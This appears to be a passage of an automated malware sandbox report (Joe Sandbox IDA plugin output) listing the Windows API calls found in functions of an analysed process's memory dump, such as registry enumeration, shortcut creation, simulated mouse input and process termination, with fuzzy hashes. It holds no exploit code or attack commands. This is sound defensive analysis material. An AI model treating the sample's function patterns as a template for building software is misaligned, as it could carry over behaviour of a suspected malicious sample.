                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7C10E,?,?), ref: 00C7D415
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D451
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4C8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4FE
                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7C72A
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7C785
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C7C7CA
                                                                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C7C7F9
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C7C853
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C7C85F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4751d420b0fcc8cb13259e2fe8f34597ff6cdfbb8513905b3f55650a1f2c0ecc
                                                                                                                                                                                                                                                                            • Instruction ID: 22aee9a0ae68facb52988a112dac6e68f1ee68794c1048ef4307612ac30c665b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4751d420b0fcc8cb13259e2fe8f34597ff6cdfbb8513905b3f55650a1f2c0ecc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33819075108246AFC714DF24C8C5E2ABBE5FF84308F14859CF55A4B2A2DB31EE49CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 00C500A9
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C50150
                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00C50354,00000000), ref: 00C50179
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00C50354), ref: 00C5019D
                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00C50354,00000000), ref: 00C501A1
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C501AB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                            • Opcode ID: 607f986909bc4b74850f8a756b488c30ffc50547639899cca67788ed0ce35768
                                                                                                                                                                                                                                                                            • Instruction ID: 7c420241521da85a95dc71ad48955675fc91a074151029a5ab2f69070e4c41e8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 607f986909bc4b74850f8a756b488c30ffc50547639899cca67788ed0ce35768
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA51C539600314AACF20AB659C89B2DB3A5EF45312F349446ED06DF2D6DB709CC8DB5A
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF41EA: _wcslen.LIBCMT ref: 00BF41EF
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00C69F2A
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C69F4B
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C69F72
                                                                                                                                                                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00C69FCA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                                            • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                            • Opcode ID: 7b964a714f1753726ed5158187b61337904f2153c10a9780f33be6b82271aeec
                                                                                                                                                                                                                                                                            • Instruction ID: a0031a63d50c1e3e621d3155d76ac02d05c30590d628b2064c7658a4705b821a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b964a714f1753726ed5158187b61337904f2153c10a9780f33be6b82271aeec
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15E1A2315043049FC724EF24C881B6AB7E4FF85314F1489ADF99A9B2A2DB71DD49CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C66F21
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C6707E
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00C90CC4,00000000,00000001,00C90B34,?), ref: 00C67095
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C67319
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                            • Opcode ID: a4dd009d655da1b330060d0d1245049f8efb468cd17d5416ecb3d93bd147cd24
                                                                                                                                                                                                                                                                            • Instruction ID: 8b2736291311926275d7e05f9a83f078da9303068860260a3021673dbec32f68
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4dd009d655da1b330060d0d1245049f8efb468cd17d5416ecb3d93bd147cd24
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82D14A71508205AFC314EF64C881E6BB7E8FF98708F40496DF5968B262DB71ED49CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?,?), ref: 00BF1B35
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00BF1B99
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00BF1BB6
                                                                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BF1BC7
                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00BF1C15
                                                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00C33287
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1C2D: BeginPath.GDI32(00000000), ref: 00BF1C4B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                            • Opcode ID: f4bfa8c2c30340471440f244be045e8a1990c67a80ea7e722309298234b18359
                                                                                                                                                                                                                                                                            • Instruction ID: cb14caeb045299dadb73295833dc3ef3e86c5213591788da8da5f8cf9c967a1b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4bfa8c2c30340471440f244be045e8a1990c67a80ea7e722309298234b18359
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA418070204344EFD710EF28DC85FBA7BE8EB45334F140AA9FA658B1A2D7719948DB61
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C611B3
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C611EE
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00C6120A
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00C61283
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C6129A
                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C612C8
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                            • Opcode ID: 45209674b6c1fc60442e0b8f9fe100487c6dcda1db973954fa945bc23ded8ac3
                                                                                                                                                                                                                                                                            • Instruction ID: deaacf5fee04703127071e27fd576a7fe35ab2be6d079afe97bf4325eff141cf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45209674b6c1fc60442e0b8f9fe100487c6dcda1db973954fa945bc23ded8ac3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88414A71900205ABDF149F54DCC5BAEB7B8FF05311F2840A5EE009A296DB74DEA1EBA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C4FBEF,00000000,?,?,00000000,?,00C339E2,00000004,00000000,00000000), ref: 00C88CA7
                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00C88CCD
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00C88D2C
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00C88D40
                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00C88D66
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00C88D8A
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                                                                                                                            • Opcode ID: dece3494d01932e30da615a42e3f537b873804966ea454eda8b8ffeb07d62003
                                                                                                                                                                                                                                                                            • Instruction ID: 4f9f1871905894e99f8240f7a7116f8b1e139f724c6fd78685a71630b7333c78
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dece3494d01932e30da615a42e3f537b873804966ea454eda8b8ffeb07d62003
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32412930601245AFDB25EF24C889FA57BF0FF45309F5800A9E5194B6B6CB71AD4ACB64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 00C72D45
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6EF33: GetWindowRect.USER32(?,?), ref: 00C6EF4B
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C72D6F
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C72D76
                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C72DB2
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C72DDE
                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C72E3C
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                            • Opcode ID: e09af1b056228ecb053c4abc990b10c3e01b241166cad3b8584d09bc31336db4
                                                                                                                                                                                                                                                                            • Instruction ID: 24ea46e3b88150bd5e31aa2421ec65651029732866d4921c54cc6fbde8168f01
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e09af1b056228ecb053c4abc990b10c3e01b241166cad3b8584d09bc31336db4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4231DC72505315AFC720DF54C849F9BB7A9FF94314F00492EF899A7181DA30EA89CBD6
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00C555F9
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C55616
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C5564E
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5566C
                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C55674
                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00C5567E
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 72514467-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF55D1,?,?,00C34B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BF5871
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C662C0
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C663DA
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00C90CC4,00000000,00000001,00C90B34,?), ref: 00C663F3
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C66411
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                            • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C88740
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00C88765
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C8877D
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00C887A6
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C6C1F2,00000000), ref: 00C887C6
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00C887B1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00C136E9,00C13355), ref: 00C13700
                                                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C1370E
                                                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C13727
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00C136E9,00C13355), ref: 00C13779
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00C14D53,00000000,?,?,00C168E2,?,?,00000000), ref: 00C230EB
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2311E
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23146
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00C23153
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00C2315F
                                                                                                                                                                                                                                                                            • _abort.LIBCMT ref: 00C23165
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BF1F87
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1F2D: SelectObject.GDI32(?,00000000), ref: 00BF1F96
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1F2D: BeginPath.GDI32(?), ref: 00BF1FAD
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1F2D: SelectObject.GDI32(?,00000000), ref: 00BF1FD6
                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00C894AA
                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 00C894BE
                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00C894CC
                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 00C894DC
                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 00C894EC
                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 00C894FC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 43455801-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C55B7C
                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C55B8D
                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C55B94
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00C55B9C
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C55BB3
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C55BC5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BF32AF
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BF32B7
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BF32C2
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BF32CD
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BF32D5
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BF32DD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C5F447
                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C5F45D
                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00C5F46C
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5F47B
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5F485
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5F48C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                            • String ID:
